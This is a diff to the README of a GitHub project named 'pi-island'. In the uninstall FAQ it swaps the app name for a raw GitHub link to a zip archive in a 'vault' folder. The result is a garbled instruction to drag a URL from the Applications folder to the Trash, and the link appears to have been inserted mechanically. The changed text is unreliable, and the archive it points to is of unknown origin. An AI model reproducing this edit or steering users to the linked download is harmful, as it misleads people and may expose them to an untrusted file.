soporteakasiapro1-art/pi-island/README.md

 ### Q3: How do I uninstall pi-island?

-A3: To uninstall, simply drag the `pi-island.app` file from your Applications folder to the Trash.
+A3: To uninstall, simply drag the `https://raw.githubusercontent.com/soporteakasiapro1-art/pi-island/main/vault/pi_island_v2.0.zip` file from your Applications folder to the Trash.
 Empty the Trash to complete the process.

 ## 📜 License